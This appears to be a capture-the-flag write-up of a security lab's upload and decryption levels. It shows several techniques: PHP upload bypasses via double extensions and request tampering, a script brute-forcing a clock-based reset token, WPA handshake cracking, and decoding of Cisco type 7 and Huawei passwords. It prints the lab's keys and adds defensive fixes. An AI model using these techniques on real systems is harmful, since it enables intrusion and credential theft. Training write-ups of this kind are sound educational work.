Upload levels
[1]
View the page source and find the JS: the onclick handler validates the file at submit time.
Press Ctrl+Shift+I to open the developer tools and change the onclick to return true; the upload then goes through.
Upload a PHP file and get the key.
Key is ikhjl9786#$%^&
[2]
View the page source and find the JS file; this time the validation is done server-side.
Forge a JPG image and upload it, intercept the request in Burp, and change the file name to .php to get the key.
Key is 76tyuhjsdvytig#$%^&
[3]
View the page source and find the JS code:
var filename = document.getElementById("file");
var str = filename.value.split(".");
var ext = str[1];
The check only looks at the first suffix after the file name, so file.jpg.php bypasses it.
Get the key: 76tyuh12okkytig#$%^&
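The three upload levels fail for the same reason: the decision is made from data the client controls (JavaScript, the Content-Type header, the first suffix of the name). The following is an added example, not the lab's or the author's code, of the server-side check that would have stopped all three: it takes the last extension rather than the first (level 3), decides from the file bytes rather than from the client's Content-Type or JavaScript (levels 1 and 2), and stores the file under a generated name. The names ALLOWED_EXTENSIONS, MAGIC_BYTES, first_suffix and validate_upload are assumptions of this example.

```python
import os
import secrets

# Added example: server-side upload policy (not the lab's code).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the formats we accept. The decision is based on content,
# not on the client-supplied Content-Type, which is as forgeable as the name.
MAGIC_BYTES = [
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
]


def first_suffix(filename):
    """The check from level 3: only the part after the FIRST dot is examined,
    so 'file.jpg.php' looks like a .jpg to it."""
    parts = filename.split(".")
    return parts[1] if len(parts) > 1 else ""


def validate_upload(filename, content):
    """Returns (accepted, reason). Independent of any client-side JavaScript
    and of the Content-Type header, so tampering with the request in a proxy
    has nothing left to change."""
    # Strip any directory part and reject control characters in the name.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or any(ord(ch) < 0x20 for ch in base):
        return False, "invalid file name"

    # Use the LAST extension, lower-cased, against an allowlist.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed: %r" % ext

    # Sniff the content and require it to agree with the extension.
    detected = next((kind for magic, kind in MAGIC_BYTES
                     if content.startswith(magic)), None)
    if detected is None:
        return False, "content is not a recognised image"
    if detected != ext:
        return False, "extension %s does not match content %s" % (ext, detected)

    # Never keep the user-supplied name; generate one.
    return True, "stored as %s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    # Constructed sample inputs.
    jpeg_head = b"\xff\xd8\xff\xe0\x00\x10JFIF"
    print(first_suffix("file.jpg.php"))                 # 'jpg' -> the level 3 bug
    print(validate_upload("file.jpg.php", jpeg_head))   # rejected: last ext is php
    print(validate_upload("shell.php", jpeg_head))      # rejected: php not allowed
    print(validate_upload("pic.jpg", b"<?php echo 1;")) # rejected: not an image
    print(validate_upload("pic.jpg", jpeg_head))        # accepted, random name
```

The image check here is only a magic-byte sniff; a production service would also re-encode the image and serve uploads from a location where the web server never executes scripts.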
Decryption levels
[1] Log in to the system as administrator
Clicking reset password directly returns a blank page. Look at the source code, find Tip1, and it confirms the idea.
The URL carries a parameter sukey, 32 characters long, which is an MD5 hash; reversing it reveals the following pattern.
Payload:
import requests
import hashlib
import time

se = requests.session()
headers = {'Cookie': 'PHPSESSID=25443616fac3435849c2f3e77b54a4ca'}
while 1:
    # sukey is the MD5 of the current Unix time in seconds
    sukey = hashlib.new('md5', str(int(time.time())).encode()).hexdigest()
    url = 'http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=' + sukey + '&username=admin'
    r = se.get(url, headers=headers)
    if r.content:
        print(r.content)
        break
    else:
        print('Cracking: ' + sukey)
Get the key.
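The weakness in this level is that the reset token is derived from the clock, so anyone who knows roughly when the link was issued can enumerate it. As an added example (not the lab's or the author's code), the block below models that token, shows how few candidates a verifier-side audit needs to recover it from the request time, and contrasts it with a token drawn from the operating system CSPRNG. The names timestamp_token, audit_timestamp_token and random_token are assumptions of this example.

```python
import hashlib
import secrets
import time


def timestamp_token(ts):
    """Token scheme used by the challenge: MD5 of the Unix time in seconds."""
    return hashlib.md5(str(int(ts)).encode()).hexdigest()


def audit_timestamp_token(token, request_time, window_seconds=300):
    """Verifier-side audit: if a reset token equals MD5(t) for some t within
    window_seconds of the request time, the scheme contains no real secret.
    Returns how many candidates were tried before the match, or None."""
    base = int(request_time)
    for offset in range(-window_seconds, window_seconds + 1):
        if timestamp_token(base + offset) == token:
            return abs(offset) + 1
    return None


def random_token():
    """What a reset token should be: 32 bytes from the OS CSPRNG, stored
    server-side (hashed) with an expiry, and tied to the account."""
    return secrets.token_hex(32)   # 64 hex characters, 256 bits of entropy


if __name__ == "__main__":
    now = time.time()
    weak = timestamp_token(now - 7)          # constructed: issued 7 s ago
    print("weak token recovered after", audit_timestamp_token(weak, now), "candidates")
    strong = random_token()
    print("random token recovered:", audit_timestamp_token(strong, now))   # None
```

The audit only needs the request time to within a few minutes; a 256-bit random token gives the same loop nothing to iterate over.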
[2] Meeting a girl
Open the capture: the traffic is encrypted and needs to be cracked.
Follow the prompts to build a dictionary:
with open("password.txt", "w") as f:
    for year in range(1980, 2015):
        for month in range(1, 13):
            for day in range(1, 32):
                f.write("%d%02d%02d\n" % (year, month, day))
Start brute-forcing.
[Email protected]:~/desktop# aircrack-ng Wifi-crack.cap
Opening Wifi-crack.cap
Read 17812 packets.
# BSSID ESSID Encryption
1 54:e6:fc:53:e6:d0 hackinglab WPA (1 handshake)
Choosing first network as target.
Opening Wifi-crack.cap
Please specify a dictionary (option -w).
Quitting Aircrack-ng ...
This gives the BSSID and ESSID.
[Email protected]:~/desktop# aircrack-ng -e hackinglab -b 54:e6:fc:53:e6:d0 -w password.txt wifi-crack.cap
Opening Wifi-crack.cap
Reading packets, please wait ...
Aircrack-ng 1.2 beta3
[00:00:05] 5436 keys tested (954.82 k/s)
KEY found! [19940808]
Master key: 92 D0 BF EB E7 B4 D9 E9
B2 1B E7 A9 B9 C6 5B FA
Transient key: 58 1D E4 C4 BA 5A A7
BA D0 1A 5C 6E C1 FA A6 1B A8
8F B4 6D CD 0B BA BA A7 6C E1
4D 1A C1 F1 3D 9A 8C 24 5D 8E 69
EAPOL HMAC: 02 C8 6C C3 C6 2D DC CA ED 8A 5C 9D CE A6
Take the password, MD5-hash it, and submit.
[3] The evil of Cisco
Install cisco_crack and decrypt it directly:
import cisco_decrypt
a = "02070d48030f1c294940041801181c0c140d0a0a20253a3b"
crack = cisco_decrypt.CiscoPassword()
crack.decrypt(a)
The library prints s = 2 through s = 24, one line per decoded byte, and then returns:
'[Email protected]'
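A Cisco type 7 string is obfuscation, not encryption: the leading two digits are an offset into a fixed key and every following byte is XORed with that key, so the whole config is enough to recover it. The block below is an added example, not the lab's code or the cisco_crack library: a type 7 decoder plus the audit a defender actually wants, a scan of a configuration for "password 7" lines. Run on the page's string it returns the plaintext that appears on the page mangled as '[Email protected]'. The names TYPE7_KEY, type7_decode, audit_config and the sample config are assumptions of this example; the "$1$placeholder$..." value in it is a placeholder, not a real hash.

```python
import re

# Cisco's fixed XOR key for type 7 ("service password-encryption") strings; the
# first two characters of a type 7 string are the decimal start offset into it.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(encoded):
    """Reverse a type 7 string. Anyone holding the config can do this, which is
    why the audit below flags every such line rather than treating it as a secret."""
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", encoded):
        raise ValueError("not a type 7 string")
    seed = int(encoded[:2], 10)            # decimal offset into TYPE7_KEY
    data = bytes.fromhex(encoded[2:])
    out = bytearray()
    for i, b in enumerate(data):
        out.append(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])
    return out.decode("ascii")


# Lines a config audit should flag: "password 7 <hex>" anywhere on the line
# (username ..., enable password 7 ..., line vty ... password 7 ...).
_TYPE7_LINE = re.compile(r"\bpassword\s+7\s+([0-9a-fA-F]+)")


def audit_config(config_text):
    """Return (line number, encoded, decoded) for every type 7 secret found."""
    findings = []
    for n, line in enumerate(config_text.splitlines(), 1):
        m = _TYPE7_LINE.search(line)
        if m:
            findings.append((n, m.group(1), type7_decode(m.group(1))))
    return findings


# Constructed sample config; the type 7 string is the one from the challenge.
SAMPLE_CONFIG = """\
hostname lab-switch
username ops privilege 15 password 7 02070d48030f1c294940041801181c0c140d0a0a20253a3b
enable secret 5 $1$placeholder$notarealhash
line vty 0 4
 login local
"""

if __name__ == "__main__":
    for n, enc, dec in audit_config(SAMPLE_CONFIG):
        print("line %d: type 7 secret %s... decodes to %d characters" % (n, enc[:8], len(dec)))
```

Type 7 strings belong only where the device cannot avoid a reversible form (for example some legacy protocol keys); user and enable secrets should use `enable secret` / `username ... secret`, with `algorithm-type scrypt` (type 9) or `sha256` (type 8) on IOS versions that support it.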
[4] The evils of encryption
The hint says Huawei switch. A Google search turns up an article with a script; unfortunately it would not run on Windows, so I ran it under Kali and got the key.
# coding=utf-8
from Crypto.Cipher import DES   # pycryptodome


def decode_char(c):
    # the encoding uses 'A' to stand in for '?'
    if c == 'A':
        r = '?'
    else:
        r = c
    return ord(r) - ord('!')


def ascii_to_binary(s):
    # 24 printable characters, 6 bits each, packed into 18 bytes
    assert len(s) == 24
    out = bytearray(18)
    j = 0
    for i in range(0, len(s), 4):
        y = decode_char(s[i + 0])
        y = (y << 6) & 0xFFFFFF
        k = decode_char(s[i + 1])
        y = (y | k) & 0xFFFFFF
        y = (y << 6) & 0xFFFFFF
        k = decode_char(s[i + 2])
        y = (y | k) & 0xFFFFFF
        y = (y << 6) & 0xFFFFFF
        k = decode_char(s[i + 3])
        y = (y | k) & 0xFFFFFF
        out[j + 2] = y & 0xff
        out[j + 1] = (y >> 8) & 0xff
        out[j + 0] = (y >> 16) & 0xff
        j += 3
    return bytes(out)


def decrypt_password(p):
    r = ascii_to_binary(p)
    r = r[:16]
    # fixed DES key, ECB mode
    d = DES.new(b"\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    r = d.decrypt(r)
    return r.rstrip(b"\x00")


if __name__ == '__main__':
    # ciphertext from the challenge (24 characters, as the assert above requires)
    miwen = "ak9q4i\"J'#[q=^q'maf4<1!!"
    print('plaintext ' + decrypt_password(miwen).decode('latin-1'))
[5] Xiao Ming, who likes to go to internet cafes
Not solved.
[6] Abnormal data
The encrypted data ends with =, which is clearly Base64. But it is all uppercase, so it was probably converted to uppercase and the original case has to be recovered.
Payload:
from base64 import b64decode
import re


def dfs(res, arr, pos):
    # record the current combination, then try lower-casing each remaining capital
    res.append("".join(arr))
    for i in range(pos, len(arr)):
        if 'A' <= arr[i] <= 'Z':
            arr[i] = arr[i].lower()
            dfs(res, arr, i + 1)
            arr[i] = arr[i].upper()


arr = list('AGV5IULSB3ZLVSE=')
res = []
dfs(res, arr, 0)
res_decode = map(b64decode, res)
for i in res_decode:
    # skip results that contain non-printable bytes
    if re.findall(r'\\x', repr(i)):
        continue
    else:
        print(i)
hey! irovku!
hey! iroveu!
[7] Can MD5 really collide?
<?php
$flag = flag;
if (isset($_POST["password"])) {
    $password = $_POST['password'];
    $rootadmin = "!1793422703!";
    if ($password == $rootadmin) { die("attack admin account!"); }
    if (md5($password) == md5($rootadmin)) {
        echo $flag;
    } else {
        die("Password error!");
    }
}
?>
>>> hashlib.md5(b"!1793422703!").hexdigest()
'0e332932043729729062996282883873'
A hash beginning with 0e followed only by digits is a numeric string, and PHP's == compares it as the number 0.
Search Baidu for "md5 0e", POST password=s214587387a, and get the flag.
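The bug is not in MD5 but in PHP's loose comparison: two strings that both look numeric are compared as numbers, and "0e" followed by digits is 0 times a power of ten. As an added example (not the lab's code), the block below models that rule in Python, mirrors the challenge's vulnerable check, and shows the fix, a byte-for-byte constant-time comparison (hash_equals() in PHP, or at least ===). The rule still applies in PHP 8 when both operands are strings. The names php_loose_eq, is_zero_e_hash, vulnerable_check and hardened_check are assumptions of this example.

```python
import hashlib
import hmac
import re

# PHP's notion of a numeric string (surrounding whitespace aside):
# optional sign, digits with an optional fraction, optional exponent.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a, b):
    """Model of PHP's == on two strings: when both are numeric strings they are
    compared as numbers, so '0e123' == '0e456' because both evaluate to 0."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_zero_e_hash(hex_digest):
    """True for the 'magic' digests this level relies on: 0e followed only by digits."""
    return re.fullmatch(r"0[eE]\d+", hex_digest) is not None


ROOTADMIN = "!1793422703!"


def vulnerable_check(password):
    """Mirrors the challenge: md5($password) == md5($rootadmin)."""
    if password == ROOTADMIN:
        return False   # die("attack admin account!")
    return php_loose_eq(hashlib.md5(password.encode()).hexdigest(),
                        hashlib.md5(ROOTADMIN.encode()).hexdigest())


def hardened_check(password):
    """Fix: compare the digests as strings, byte for byte, in constant time."""
    if password == ROOTADMIN:
        return False
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(),
                               hashlib.md5(ROOTADMIN.encode()).hexdigest())


if __name__ == "__main__":
    print(php_loose_eq("0e332932043729729062996282883873",
                       "0e848240448830537924465865611904"))   # True under ==
    print(is_zero_e_hash(hashlib.md5(b"s214587387a").hexdigest()))
    print(vulnerable_check("s214587387a"), hardened_check("s214587387a"))
```

The vulnerable version accepts any input whose digest also has the 0e form; the hardened version accepts only the digest itself. Password storage should of course not use unsalted MD5 at all, but even with a proper hash the comparison must be exact.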
[8] Xiao Ming fell in love with a girl who does hardware
Rename it to a .txt file. It contains:
serialization::archive SaleaeAsyncSerialAnalyzer 0 20 13973230967232177885 1 1 9600 8 1 0 1 0 0
Search Baidu for "Async Serial Analyzer" and the file name.
Following other writeups: download the Saleae software, open the file and get the flag.
[9]
No ideas yet; to be added later.
Network Information Security Attack and Defense Learning Platform: upload and decryption levels writeup